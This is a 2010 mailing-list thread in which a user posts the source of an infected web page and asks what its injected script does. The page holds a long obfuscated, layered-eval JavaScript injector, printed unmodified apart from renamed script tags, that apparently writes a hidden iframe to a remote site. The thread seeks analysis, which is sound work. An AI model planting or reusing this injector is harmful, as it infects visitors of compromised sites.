This will not be harmful, even if using an html email client, as I've taken the <script> & </script> tags away & substituted them for startScript & EndScript. I've also changed some of the links to protect the identity of the site owner. The malware code, which begins at the StartScript line, remains unmodified. Website code, w/said modifications, follows: <html> <head> <title>Brochure Description.</title> <meta name="generator" content="Namo WebEditor"> </head> <body bgcolor="white" text="black" link="blue" vlink="purple" alink="red"> <p><a href="brochure.txt">Read the Brochure Description.</a></p> <p> </p> <p> </p> <p><a href="../pictures/scanner1.jpg" title="Backspace to return to the Brochure page">Click here to see the image of the scanner.</a></p> <p><a href="../index.htm">Click here to return to the main page.</a></p>
<!--
Analysis note: the text between Startscript and EndScript is a single obfuscated
JavaScript program, not binary data. It declares many short string fragments,
concatenates them into dDXmwo3A, and its last statement is eval(dDXmwo3A).
The assembled string is itself JavaScript in several layers: each layer stores a
percent-encoded string whose "%" has been swapped for a marker (X1%, Uc%, p2p, 5U,
CV% then MG), sometimes with one more character substitution first (l to 7,
jE% to C), and runs eval(unescape(NAME.replace(/MARKER/g,'%'))).
Fragments visible in this listing percent-decode to document.write,
document.getElementById, document.createElement('iframe'), .src='http://...,
.style.visibility='hidden' and appendChild( ; that is consistent with a script
that injects a hidden iframe pointing at a remote URL. The full URL and the
remaining strings are not decoded in this note, so confirm against a full decode.
To read the payload, run only the string-building statements in a standalone
JavaScript engine that has no DOM and no network access, and print dDXmwo3A
(and each later layer) instead of passing it to eval.
-->
Startscript var HZv41="0Uc%70Uc%65";var GvKLQUO="U565U3";var jmxo="56Uc%32Uc";var bM0s4kK="65X1%6EX";var VEBu9H=")));var u7WWvGG";var IrujHKMf="cape(VeXTi";var D4yffv="2p27p2p3Bp2p45p";var f8PbNZny="45Ul05U3A5U2F5";var M0qRNPX="2p27p2p3";f8PbNZny+="U2F5U665U";var uSEZFp="%6CUc%64";var Z63uwf3L="2p6Dp2p39";var VMBo="X1%4AX1%";var aomWLFkN="pe(sVYxD.repla";var IzwRw="75X1%6CX1%6CX";var Dfpl="%G6ECV%G";var YmEnz0="BUc%62Uc%7AUc%6";var THWVXP="%65X1%6D";var Sq0sXIq="8Uc%29Uc";var BYWZ61="64X1%6FX1%6";var UDJ1U="1%69X1%";M0qRNPX="Dp2p27p2p31p"+M0qRNPX;var LEAFMHeO="7X1%6EX";var uWgM="lace(/5U/g";var IHW7e="2X1%6DX1%4AX1%2";var kj8q4EDR="X1%4CX1%";var vfK9="4X1%2EX1%77";var Gh094="1%27X1%6EX1%4A";IHW7e+="7X1%3EX1%3";var LLKQ="1%22X1%3BX1%";var EKtdBNSm="EX1%27X1%3BX";var FNc4c="%69X1%76";var QdyeSQ="2p68p2p2Ep2";Dfpl="%G65CV"+Dfpl;YmEnz0="Uc%6EUc%27Uc%3"+YmEnz0;Sq0sXIq="0Uc%76Uc%6"+Sq0sXIq;bM0s4kK=BYWZ61+"3X1%75X1%6DX1%"+bM0s4kK;var FiX0XoS="62X1%6FX1%6";var E5x2dsN="2E5U6C5U655U6";var OVUIGhiv="1%74X1%2EX1%62";Gh094="1%64X1%28X"+Gh094;vfK9="1%6EX1%7"+vfK9;var aVOu3="1%22X1";var kzAcz1J="62X1%34X";kzAcz1J+="1%75X1%4AX";var RELt3a="1%62X1%7AX1%";var 
Qo2CkEnH="2p65p2p3Dp2";kj8q4EDR="61X1%72X1%20"+kj8q4EDR;bM0s4kK+="1%74X1%2EX1%67X";var dDXmwo3A="vGG.replace";var bhxk="to='CV%G76CV%";var IkVX="V%G61CV%";var A1qyC62H="Uc%3DU";var iYkv7M="c%2EUc%";var KQ2oM="V%G56CV%G32";LLKQ+="69X1%66X1%28X1%";THWVXP+="X1%65X1%6EX1%";var R4UlrgM="c%2EUc%73Uc%74";var Xpl0="CV%G65CV%G6ECV";var GDWRD71W="9X1%3B";Qo2CkEnH="2p6Ep2p61p2p6Dp"+Qo2CkEnH;OVUIGhiv="X1%6EX"+OVUIGhiv;var QDgE5S="V%G65CV";LLKQ="76X1%3EX"+LLKQ;var Gn1Hf="X1%4AX1%";dDXmwo3A="l(unescape(u7WW"+dDXmwo3A;FNc4c=aVOu3+"%3CX1%64X1"+FNc4c;D4yffv="p3Dp2p27p2p31p"+D4yffv;var iI37="5Uc%2EUc";LLKQ="1%69X1%"+LLKQ;var sh0nfd="val(une";Xpl0="G6CCV%G65CV%G6D"+Xpl0;IkVX+="G6DCV%G65CV";var RA2Xa0C="X1%4AX1%29";FiX0XoS="3CX1%2FX1%"+FiX0XoS;var aYuQp="2p68p2p65p2";var nH1U="1%63X1%75";var Chhxqnc="c%6EUc%55Uc";EKtdBNSm+="1%64X1%";RA2Xa0C+="X1%3BX1%76X1";kzAcz1J="4CX1%4AX1%"+kzAcz1J;kj8q4EDR+="4AX1%62X1%34X1%";VEBu9H+="='Uc%45Uc%6";bM0s4kK=RELt3a+"67X1%33X1%3DX1%"+bM0s4kK;var Bne0Vu="2p50p2p45p2p";IzwRw+="1%29X1%4CX1";var EqUHdyH="2p32p2p50p";dDXmwo3A+="(/Uc%/";var PGGTC8G4="%3CX1%62X1%6FX1";IkVX="V%G66CV%G72C"+IkVX;Bne0Vu+="42p2p4Ap2p38p2";var XOCC="/jE%/g,";var V2GOJW="79X1%3DX";IkVX="8CV%G27CV%G69C"+IkVX;var RxjaBhHe="nescape(cwM8a.";Sq0sXIq=Chhxqnc+"%56Uc%32Uc%5"+Sq0sXIq;YmEnz0="c%64Uc%64Uc%65"+YmEnz0;var NxrXgFJ="/CV%/g,'M')";var CFTN="G6FCV%G6";jmxo=VEBu9H+"EUc%55Uc%"+jmxo;FiX0XoS=kzAcz1J+"1%2BX1%27X1%"+FiX0XoS;PGGTC8G4+="%64X1%79X1%3EX1";XOCC="replace("+XOCC;OVUIGhiv=nH1U+"X1%6DX1%65"+OVUIGhiv;var hwdh="G72CV%G";Qo2CkEnH=EqUHdyH+"2p76p2p68p2p2Ep"+Qo2CkEnH;EKtdBNSm+="6FX1%63X1%75X";D4yffv="p2p74p2"+D4yffv;vfK9+="X1%72X1%69X1%7";D4yffv=aYuQp+"p69p2p67p2p68"+D4yffv;IkVX=Xpl0+"%G74CV%G2"+IkVX;D4yffv="8p2p2Ep"+D4yffv;iI37+="%76Uc%69Uc%73U";IzwRw+="%4AX1%62X";FNc4c=kj8q4EDR+"75X1%4AX1%3DX"+FNc4c;M0qRNPX="p68p2p3"+M0qRNPX;Gh094="2X1%79X1%49X"+Gh094;var JQuU22H="56p2p32p2p50p";RxjaBhHe="l5U3B';eval(u"+RxjaBhHe;var GmdcLH="g,'%')));var c";dDXmwo3A=Sq0sXIq+"%3B';eva"+dDXmwo3A;var 
DowPTru="='p2p45p2p6E";f8PbNZny="l5U685Ul45Ul"+f8PbNZny;UDJ1U=FNc4c+"X1%20X"+UDJ1U;IkVX=QDgE5S+"%G45CV%"+IkVX;uWgM=",'7').rep"+uWgM;NxrXgFJ="place("+NxrXgFJ;NxrXgFJ=IrujHKMf+"Xto.re"+NxrXgFJ;OVUIGhiv=LLKQ+"64X1%6FX"+OVUIGhiv;Dfpl=CFTN+"3CV%G75CV%G6DCV"+Dfpl;uWgM=RxjaBhHe+"replace(/l/g"+uWgM;Z63uwf3L="4p2p77p"+Z63uwf3L;EKtdBNSm=FiX0XoS+"4X1%79X1%3"+EKtdBNSm;XOCC+="'C').repla";M0qRNPX+="Bp2p45p2p6";iI37=R4UlrgM+"Uc%79Uc%6CUc%6"+iI37;KQ2oM+="CV%G50CV%G7";PGGTC8G4=Gn1Hf+"3DX1%27X1"+PGGTC8G4;iI37=jmxo+"%50Uc%76Uc%68U"+iI37;iYkv7M=YmEnz0+"7Uc%33U"+iYkv7M;IHW7e="36X1%4"+IHW7e;Gh094+="X1%36X1";Dfpl="G3DCV%G64CV%"+Dfpl;UDJ1U="%76X1%"+UDJ1U;iYkv7M=A1qyC62H+"c%27Uc%68Uc%69U"+iYkv7M;UDJ1U="var sVYxD='X1"+UDJ1U;JQuU22H=M0qRNPX+"Ep2p55p2p"+JQuU22H;E5x2dsN="5U695Ul45Ul35U"+E5x2dsN;var M9KCV="c%6CUc%69Uc%7";uSEZFp="%43Uc%68Uc%69Uc"+uSEZFp;bM0s4kK+="1%65X1%74X1";dDXmwo3A=uSEZFp+"Uc%28Uc%45U"+dDXmwo3A;V2GOJW=OVUIGhiv+"X1%6FX1%64X1%"+V2GOJW;E5x2dsN+="D5U6F5U";IkVX="65CV%G61CV%G74C"+IkVX;GmdcLH+="wM8a='5U455U";var kVenPGu1="5U2E5Ul35Ul25U6";var OSQgQl="Ull5Ul35U2F5U";GDWRD71W="1%4AX1%27X1%2"+GDWRD71W;Gh094=THWVXP+"74X1%4"+Gh094;var NPjBLDc="p56p2p32p";f8PbNZny=kVenPGu1+"35U3D5U2"+f8PbNZny;IzwRw=V2GOJW+"1%3DX1%6EX1%"+IzwRw;Dfpl=KQ2oM+"6CV%G68CV%"+Dfpl;uWgM+=",'%')));var 
x";Dfpl+="74CV%G2EC";IHW7e=LEAFMHeO+"1%4AX1%"+IHW7e;RA2Xa0C=VMBo+"62X1%34X1%75"+RA2Xa0C;D4yffv=JQuU22H+"2p76p2p6"+D4yffv;hwdh+="20CV%G45CV%";IkVX=Dfpl+"V%G63CV%G72CV%G"+IkVX;iYkv7M=M9KCV+"4Uc%79"+iYkv7M;IkVX=hwdh+"G6ECV%G55C"+IkVX;EKtdBNSm=PGGTC8G4+"%27X1%2BX1%"+EKtdBNSm;dDXmwo3A+="g,'%')))";GvKLQUO=GmdcLH+"6E5U555"+GvKLQUO;DowPTru=uWgM+"sMZ5Nj1"+DowPTru;sh0nfd=Z63uwf3L+"p2p27p2p3B';e"+sh0nfd;bM0s4kK=RA2Xa0C+"%61X1%72X1%20X"+bM0s4kK;Qo2CkEnH=D4yffv+"2p6Ep2p55p2p56p"+Qo2CkEnH;sh0nfd=Bne0Vu+"p47p2p4jE%p2p5"+sh0nfd;vfK9+="4X1%65X1%20X1";IkVX=bhxk+"G61CV%"+IkVX;NPjBLDc=DowPTru+"p2p55p2"+NPjBLDc;Gh094=bM0s4kK+"%45X1%6CX1"+Gh094;dDXmwo3A+=";";E5x2dsN=f8PbNZny+"l25Ul5"+E5x2dsN;IHW7e=UDJ1U+"64X1%3DX1%2"+IHW7e;aomWLFkN=GDWRD71W+"';eval(unesca"+aomWLFkN;aomWLFkN=Gh094+"%42X1%6DX"+aomWLFkN;aomWLFkN+="ce(/X1%/g,'%";E5x2dsN=GvKLQUO+"25U505Ul65U68"+E5x2dsN;IkVX=aomWLFkN+"')));var VeXTiX"+IkVX;XOCC=sh0nfd+"scape(xsMZ5Nj1."+XOCC;IkVX=vfK9+"%28X1%4C"+IkVX;dDXmwo3A=HZv41+"Uc%6EUc%64Uc"+dDXmwo3A;IzwRw=IHW7e+"CX1%2FX1%64X"+IzwRw;Qo2CkEnH="9p2p64p2p74p2"+Qo2CkEnH;IkVX+="%G27CV%G29CV";EKtdBNSm=IzwRw+"1%34X1%75"+EKtdBNSm;NxrXgFJ=IkVX+"%G3B';eval(unes"+NxrXgFJ;dDXmwo3A=iYkv7M+"61Uc%7"+dDXmwo3A;XOCC=Qo2CkEnH+"p27p2p44p"+XOCC;QdyeSQ=NPjBLDc+"2p50p2p76p"+QdyeSQ;iI37=XOCC+"ce(/p2p/g,'%'"+iI37;E5x2dsN=NxrXgFJ+".replace(/MG/"+E5x2dsN;dDXmwo3A=iI37+"c%69Uc%62Uc%69U"+dDXmwo3A;dDXmwo3A=QdyeSQ+"p77p2p6"+dDXmwo3A;OSQgQl=E5x2dsN+"6E5U695U615U2E5"+OSQgQl;OSQgQl=EKtdBNSm+"1%6DX1%65X"+OSQgQl;dDXmwo3A=OSQgQl+"545U625U6C5U2"+dDXmwo3A;eval(dDXmwo3A); EndScript </body> </html> On 7/3/10, Dave <davidct1209@xxxxxxxxx> wrote: > At initial read of your message, it sounds like a cross-site scripting > attack. I'm not sure of any browsers that render binary code within > script tags, so not sure what that is since usually xxs attacks inject > java script running in the user's security context. 
>
> On 7/3/10, Jackie McBride <abletec@xxxxxxxxx> wrote:
>> Hay, yall:
>>
>> I was just thinkin (& that's always dangerous for me), but, now that
>> I've come out of my lurking hole, perhaps I'll keep my head out just a
>> bit longer & ask this. I hammered a virus off of a website the other
>> day. For whatever reason, it got my curiosity up, & I was rather
>> wondering exactly what its code does. So: any1 got any ideas of how to
>> analyze that? It looked like a compiled script (at least there were
>> <script> </script> tags, but between those tags was output that 1
>> would associate w/a binary file.
>>
>> I sure would like to know precisely what it does. I'm also surprised
>> that out of several A V apps I tested, the only 1 to pick it up was
>> Avast. Still, I know it did not belong in that site, given the source
>> of other pages that I saw on the same site that weren't infected.
>>
>> --
>> Change the world--1 deed at a time
>> Jackie McBride
>> Scripting Classes: http://jawsscripting.lonsdalemedia.org
>> homePage: www.abletec.serverheaven.net
>> For technophobes: www.technophoeb.com
>> __________
>> View the list's information and change your settings at
>> //www.freelists.org/list/programmingblind
>>
>>
> __________
> View the list's information and change your settings at
> //www.freelists.org/list/programmingblind
>
>

--
Change the world--1 deed at a time
Jackie McBride
Scripting Classes: http://jawsscripting.lonsdalemedia.org
homePage: www.abletec.serverheaven.net
For technophobes: www.technophoeb.com
__________
View the list's information and change your settings at
//www.freelists.org/list/programmingblind